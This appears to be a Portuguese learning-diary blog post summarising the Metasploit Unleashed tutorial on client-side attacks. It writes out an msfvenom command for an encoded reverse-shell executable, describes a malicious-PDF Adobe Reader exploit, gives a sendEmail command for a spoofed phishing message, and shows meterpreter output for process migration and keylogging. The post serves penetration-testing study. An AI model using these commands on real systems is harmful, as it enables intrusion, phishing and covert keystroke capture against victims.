DIA#24-Ethical Hacking Tools (Metasploit- Client-Side Attacks)

    Continuo hoje o tutorial da Offensive Security, desta vez focando nos Client-Side Attacks.
    
    Os client-side precisam user-interaction como a vitima clicar em links, abrir um documento ou chegar de alguma maneira ao website malicioso. Existem várias maneiras de usar Metasploit para realizar client-side attacks, sendo algumas das maneiras demonstradas de seguida.
    Uma das maneiras possíveis de fazer os client-side attacks é através do uso da ferramenta msfvenom, esta ferramenta pode ser usada para gerar payloads em diferentes sítios, com diferentes outputs. Um exemplo de uso é por exemplo com o comando "msfvenom --payload-options -p windows/shell/reverse_tcp" é possível observar as diferentes opções existentes para os payload escolhido, neste caso "reverse_tcp", tendo as opções em conta usa-se o comando "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe" para gerar o payload para um ficheiro executável, neste caso "1.exe", depois disto irá-se usar o módulo "multi/handler", que é usado para lidar com exploits iniciadas fora do Framework, para fazer uso deste módulo usa-se, neste caso, "set payload windows/shell/reverse_tcp" e depois faz-se a configuração do LHost e LPort pretendidos, depois de tudo isto falta apenas correr o exploit do "multi/handler" e executamos o ficheiro .exe criado anteriormente na vitima, o "multi/handler" irá tratar do exploit e apresentar a shell.
    
    Outro exemplo que foi apresentado no tutorial foi o exploit para aproveitar a vulnerabilidade de stack-based buffer-overflow que existia no Adobe Reader devido à aplicação não fazer os boundary checks devidos à data enviada pelo user. Para fazer uso desse exploit usa-se o módulo "adobe_utilprintf" para criar o ficheiro PDF malicioso em que se coloca em payload um "reverse_tcp". 
    Depois da criação do ficheiro e antes de o enviar para a vitima é necessário fazer o setup de algo para "ouvir" o reverse_tcp, que irá ser o módulo "/multi/handler". 
    Neste momento passa-se para o envio do email (supondo que se tem o email da vitima), onde se usa o script "sendEmail", por exemplo, "sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf", em que as opções apresentadas representam: FROM (-f) address, TO (-t) address, SMTP (-s) server, titulo do mail(-u) e PDF  malicioso(-a). Após clicar o enter do comando anterior pode-se escrever o mail e clica-se CTRL+D para enviar a mensagem.
    Finalmente espera-se que a vitima tente abrir o ficheiro e fica-se com acesso à shell, a partir dai deve-se mudar a shell de processo para não a perder quando encerrarem o Adobe, esse processo encontra-se descrito na seguinte imagem parcialmente retirada de "https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/".

meterpreter > ps

Process list
============

    PID   Name            Path                                 
    ---   ----            ----                                 
    852   taskeng.exe     C:\Windows\system32\taskeng.exe      
    1308  Dwm.exe         C:\Windows\system32\Dwm.exe          
    1520  explorer.exe    C:\Windows\explorer.exe              
    2184  VMwareTray.exe  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    2196  VMwareUser.exe  C:\Program FilesVMware\VMware Tools\VMwareUser.exe
    3176  iexplore.exe    C:\Program Files\Internet Explorer\iexplore.exe
    3452  AcroRd32.exe    C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)

meterpreter > sysinfo
Computer: OFFSEC-PC
OS      : Windows Vista (Build 6000, ).

meterpreter > use priv
Loading extension priv...success.

meterpreter > run post/windows/capture/keylog_recorder 

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
[*] Recording keystrokes...

root@kali:~# cat /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
Keystroke log started at Wed Mar 23 09:18:36 -0600 2011 ...    


PS. 
         
      

Comentários

Mensagens populares deste blogue

DIA#36-OverTheWire-Bandit (LVL 2)

DIA#45-OverTheWire-Bandit (LVL 11)

DIA#52-OverTheWire-Bandit (LVL 18)